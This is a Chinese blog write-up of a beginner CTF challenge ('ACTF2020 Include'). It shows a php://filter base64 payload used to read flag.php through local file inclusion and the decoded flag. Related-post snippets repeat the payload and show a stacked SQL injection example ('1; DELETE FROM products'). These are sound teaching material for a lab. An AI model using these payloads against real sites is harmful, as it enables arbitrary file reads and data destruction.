[buuoj记录][ACTF2020 新生赛]Include

最新推荐文章于 2023-05-08 15:51:30 发布
最新推荐文章于 2023-05-08 15:51:30 发布
阅读量240 收藏
点赞数
分类专栏: web 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42250840/article/details/106956726
版权

圈重点:利用php://filter伪协议进行文件包含

不多说,按照提示点进去
在这里插入图片描述

在这里插入图片描述
看到这,考虑"php://input"伪协议 + POST发送PHP代码
在这里插入图片描述
题目对php://input 进行了过滤
在这里插入图片描述

那就再试试 “php://filter"伪协议” 来进行包含

构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php

成功读取源码:
在这里插入图片描述

解码得到flag:

<?php
echo "Can you find out the flag?";
//flag{c61c3a8a-71e9-4f6b-beb7-d1599f47ea7f}

本题考点:php://filter伪协议,当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,阻止其不执行。从而导致任意文件读取。

Matrix_Ceasor
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
潞安矿区高河井田构造样式探讨
06-24
高河井田位于沁水块坳东南部,主要含煤地层包括二叠系下统山西组和石炭系上统太原组,构造要素走向总体为近SN—NNE向。通过对高河井田构造的系统分析,划分了两大类三亚类主要构造样式,并结合实例分析了各种构造样式对...
BUUCTF Web [ACTF2020 新生]Include
热门推荐
wangyuxiang946的博客
10-27 1万+
「作者主页」:士别三日wyx   此文章已录入专栏《网络攻防》,持续更新热门靶场的通关教程 「未知攻,焉知收」,在一个个孤独的夜晚,你完成了几百个攻防实验,回过头来才发现,已经击败了百分之九十九的同期选手。 [ACTF2020 新生]Include一、题目简介二、思路分析三、解题步骤1)包含 flag.php2)PHP伪协议编码文件3)解码文件内容四、总结 一、题目简介 进入题目链接后只有一个「链接」 点击链接后来到 falg.php 页面,里面是一句作者深情的「问候」。 二、.
buuoj include writeup
最新发布
m0_73605862的博客
05-08 91
file=php://filter/read=convert.base64-encode/resource=flag.php,得到一串base64的字符串。在线网页为:https://www.toolhelper.cn/EncodeDecode/Base64EncodeDecode。Step1:点击tips,发现file=flag.php,猜测是”php://input”伪协议,+POST发送PHP代码。【来源】(buuoj)https://buuoj.cn/【思路】php伪协议。
BUUOJweb刷题wp(三)
Theseus_sky的博客
09-15 526
强网杯2019随便注 堆叠注入原理 在SQL中,分号(;)是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于union 或者union all执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入:1; DELETE FROM products服务器端生成的sql语
BUUCTF WEB INCLUDE &&Ping Ping Ping
m0_46315342的博客
08-20 778
BUUCTF WEB INCLUDE 进去之后看到的是这样的,然后点击链接, 在这里试一下php伪协议,构造URL为 http://1ec44303-73b4-47c1-b74e-764c7f147d6f.node3.buuoj.cn/?file=php://filter/convert.base64-encode/resource=flag.php 得到 拿去解压之后可以达到: <?php echo "Can you find out the flag?"; //flag{672214de-
BUUCTF刷题笔记 Include
m0_46576074的博客
05-14 361
[ACTF2020 新生]Include 进入网址 http://ea90edbb-9604-451e-91d3-101f65554fee.node3.buuoj.cn/?file=flag.php 使用 “php://filter"伪协议” 来进行包含 构造Payload: ?file=php://filter/read=convert.base64-encode/resource=flag.php 进入 http://ea90edbb-9604-451e-91d3-101f65554fee.n
matlab的90个实例.rar_actf8x_matlab基础知识的90个实例
09-24
学习matlab的基本使用例子,有矩阵运算,绘制曲线图等
Jeopardy-Writeups:SniperOJ的CTF挑战比
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
NTFS文件系统分析
09-19
NTFS文件系统分析,比较详细的介绍,各个元文件的定义,偏移
光立方888 573 2803程序
06-14
光立方888 573 2803程序,有详细的原理图
Buuctf_Include【文件包含——伪类】
qq_61968245的博客
12-17 615
0x01 题目链接 BUUCTF在线评测BUUCTF 是一个 CTF 竞和训练平台,为各位 CTF 选手提供真实题在线复现等服务。https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 0x02
buuctfweb刷题wp详解及知识整理----warm up(文件包含加php代码审计)
weixin_45784586的博客
12-31 772
buuwe—warm up的wp wp! 上来一个超级滑稽脸(冥冥中仿佛滑稽看透了险恶的ctf世界的真相)。。 F12或者开发者工具看源码 注释中有提示那就访问一下 源码得到 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page...
BUUCTF | ACTF2020新生 include
weixin_47982238的博客
08-29 264
http://ee2ad130-7749-4957-b7b2-838f88b2bdd7.node3.buuoj.cn/ 其实看题目include我就先猜测也许是文件包含??? 点击tips,然后看到url栏如下图 看到?file=flag.php十有八九就是文件包含啦, 于是构造payload读取文件源码: ?file=php://filter/read=convert.base64-encode/resource=flag.php 看到一串base64编码,拿去解码成功拿到
[WUSTCTF2020]dp_leaking_1s_very_d@angerous
2er0!=O的博客
07-23 633
[WUSTCTF2020]dp_leaking_1s_very_d@angerous 附件: e = 65537 n = 156808343598578774957375696815188980682166740609302831099696492068246337198792510898818496239166339015207305102101431634283168544492984586566799996471150252382144148257236707247267506165670877506
buuoj ACTF新生2020 Universe_final_answer
pondzhang的专栏
04-20 449
from z3 import * s = Solver() v1 = Int('v1') v2 = Int('v2') v3 = Int('v3') v4 = Int('v4') v5 = Int('v5') v6 = Int('v6') v7 = Int('v7') v8 = Int('v8') v9 = Int('v9') v11 = Int('v11') s.add(-85 * v9 +...
buuctf [ACTF新生2020]Universe_final_answer wp
苗_的博客
08-13 1478
f5找到主函数,发现关键函数sub_860(): 点进去看一下函数逻辑:
BUUCTF:[ACTF2020 新生]Include
末初的CSDN博客
10-06 796
题目地址:https://buuoj.cn/challenges#[ACTF2020%20%E6%96%B0%E7%94%9F%E8%B5%9B]Include 文件包含直接伪协议读取flag.php ?file=php://filter/convert.base64-encode/resource=flag.php PS C:\Users\Administrator> php -r "var_dump(base64_decode('PD9waHAKZWNobyAiQ2FuIHlvdSBma.
BUUCTF:黑客帝国
末初的CSDN博客
11-01 4466
题目地址:https://buuoj.cn/challenges#%E9%BB%91%E5%AE%A2%E5%B8%9D%E5%9B%BD 开头很像RAR文件的十六进制数据,利用脚本将这些数据以二进制流形式写入文件
BUUCTF__[ACTF2020 新生]Upload_题解
风过江南乱的博客
07-07 1649
BUUCTF__[ACTF2020 新生]Upload_题解
[actf2020 新生]include
03-16
好的,我理解您的请求是让我用中文回答您的问题,那么以下是关于 "actf2020 新生" 和 "include" 的回答: "actf2020 新生" 是指 2020 年举行的一项针对新生的网络安全竞。该比旨在通过一系列的挑战来测试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值